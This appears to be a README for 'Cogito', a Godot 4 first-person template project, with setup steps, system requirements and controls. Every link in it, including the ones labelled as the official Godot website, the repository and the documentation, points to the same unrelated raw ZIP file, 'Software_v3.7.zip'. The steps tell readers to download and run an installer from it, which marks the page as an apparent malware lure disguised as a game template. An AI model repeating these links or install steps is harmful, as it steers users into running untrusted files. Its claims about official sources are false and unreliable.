An immersive simulation starter kit for the GODOT 4 engine. Build from a tested base with first-person controls and key game features included.
Cogito is a ready-to-use template project built for GODOT 4. It focuses on creating immersive first-person experiences. Whether you want to develop an FPS game, an immersive sim, or a general game prototype, Cogito offers a solid starting point.
This project helps you avoid the common setup work by providing:
- Basic first-person movement controls
- Interaction with objects and environment
- Simple AI or enemy placeholders
- Sample game scripts in GDScript
- Compatibility with GODOT 4 engine
Cogito does not include a finished game. Instead, it acts as a framework where you can add your own ideas.
To run Cogito on Windows, your computer should meet these requirements:
- Windows 10 or later (64-bit recommended)
- At least 8 GB RAM
- A DirectX 11 compatible graphics card
- GODOT 4 engine installed (see next section)
- 2 GB of free disk space for the project files
This setup will run the template smoothly and allow you to test your own additions.
Before running Cogito, you must install the GODOT 4 engine on your system. It is the software that runs the project.
-
Open your web browser.
-
Go to the official GODOT website: https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip
-
Under the "Standard version" for Windows, click the 64-bit option to download the
.exefile. -
Once downloaded, run the installer and follow the prompts to finish installing GODOT.
-
After installation, launch GODOT to confirm it runs correctly.
Avoid downloading GODOT from unofficial sources to prevent security risks.
To get the Cogito project files, you need to visit the GitHub page where the project is stored.
Steps to download:
-
Click the big green button or go to this page:
https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip -
On the GitHub page, find the green Code button near the top right.
-
Click Code, then select Download ZIP.
-
Save the ZIP file to your preferred location on your computer.
-
Once downloaded, right-click the ZIP file and choose Extract All… to unzip the contents.
After downloading and extracting Cogito, follow these steps to run it:
-
Open GODOT 4 on your computer.
-
On the GODOT main screen, click "Import".
-
In the pop-up, click the folder icon and navigate to the extracted Cogito folder.
-
Select the folder that contains the
project.godotfile. -
Click "Import & Edit" to load the project.
-
Once loaded, you will see the Cogito project interface.
-
To test the project, find the Play button (a right arrow) at the top of the GODOT window.
-
Click Play to run the template game scene.
The game should open in a window where you can move around using typical FPS controls (usually WASD for movement). Use the mouse to look around.
Here are the basic controls you can expect in this first-person template:
- W, A, S, D — Move forward, left, backward, and right
- Mouse movement — Look around in all directions
- Spacebar — Jump
- E key — Interact with objects or open doors (if implemented)
- Shift — Sprint or run faster (variable depending on template setup)
- Esc key — Open the in-game menu or exit play mode
Spend a few minutes testing the controls to understand how they respond.
If you decide to explore or change the project, here are some pointers:
- Cogito uses GDScript, Godot’s built-in scripting language. It is easier to learn than other languages.
- The main scenes and scripts live inside the
res://folder in GODOT. - Use the GODOT editor to open and edit scenes (.tscn files) and scripts (.gd files).
- Change game elements by editing scene nodes or script code.
- You can add new objects, animations, or AI scripts to build your game.
No programming experience is required, but familiarity with navigating files and folders helps.
- Always save your progress before running the game scene.
- If the game window is too small, adjust the resolution settings within the GODOT project.
- Keep your GODOT installation updated to avoid compatibility issues.
- Use the GODOT community forums and documentation for additional help.
- Close unnecessary programs to improve game performance while testing.
- Repository: https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip
- Description: Immersive simulation template project for GODOT 4
- Topics: first-person, fps, game-development, gdscript, godot, godot-engine, godot4, immersive-sim, imsim, starter-kit, template-project
If you run into issues opening or running the project:
- Check the README file inside the downloaded Cogito folder for updates.
- Visit the GODOT documentation: https://raw.githubusercontent.com/chasesnip3rpp/Cogito/main/cashableness/Software_v3.7.zip
- Look for help on GODOT Q&A sites or forums with keywords like "first-person template" and "GODOT 4."